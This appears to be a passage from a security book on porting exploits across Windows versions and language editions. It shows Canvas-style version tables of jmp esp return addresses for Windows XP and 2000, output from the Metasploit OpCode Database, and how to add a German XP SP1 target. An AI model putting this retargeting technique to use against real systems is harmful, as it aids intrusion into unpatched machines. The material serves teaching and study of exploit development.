Porting an exploit from one OS version to another can be very easy or extremely difficult. Usually, porting from one OS language (e.g., English) to another (e.g., French) for the same OS version (e.g., Windows XP SP1) is one of the easiest tasks, since the logic is often similar. However, the process of porting to a totally different OS version (such as from Windows NT4 to Windows Server 2003) depends on the changes that occurred between the versions. Back porting to older versions is an easier task than porting to newer versions, since Microsoft tends to improve security with each subsequent service pack: the service exploited in Windows XP SP0 is just not available in SP1.
If there is no major code change between the two versions, just adapting the return address could be enough. Most Canvas exploits have a version table such as the one shown next. This table provides the OS version and the return address. To use a given exploit on another OS version or language without completely rewriting it, sometimes all you need to do is adapt the return address to your target OS. For example:
# Operation Name & version, jmp esp
self.versions[1]=("Windows XP EN sp0",0x77f5801c)
self.versions[2]=("Windows 2000 EN sp0",0x77f8948b)It is always a good policy to be ready to port an exploit to a new OS version or to another language version. Look for information in the OpCode Database from the Metasploit Project (see Chapter 7); they currently have all major libraries for Windows NT4 through 2003. You can access the database at http://www.metasploit.com/opcode_database.html. Using the Display Supported modules in the OpCode Database tells us that the ntdll.dll base address is 0x77f50000. What you need next is a jmp esp in ntdll.dll for another OS version. This query gives you results for OSes ranging from NT4 to 2003:
... 0x77f5801c jmp esp ntdll.dll (English / 5.1.2600.0) Windows XP 5.1.0.0 SP0 (IA32) 0x77f77343 jmp esp ntdll.dll (English / 5.1.2600.0) Windows XP 5.1.0.0 SP0 (IA32) 0x77f8948b jmp esp ntdll.dll (English / 5.0.2163.1) (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) Windows 2000 5.0.0.0 SP0 (IA32) 0x77fa59cc jmp esp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) 0x7c951eed jmp esp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) ...
Adding a German version could be as easy as adding the following to the table:
self.versions[2]=("Windows XP sp1 German",0x77fa59cc)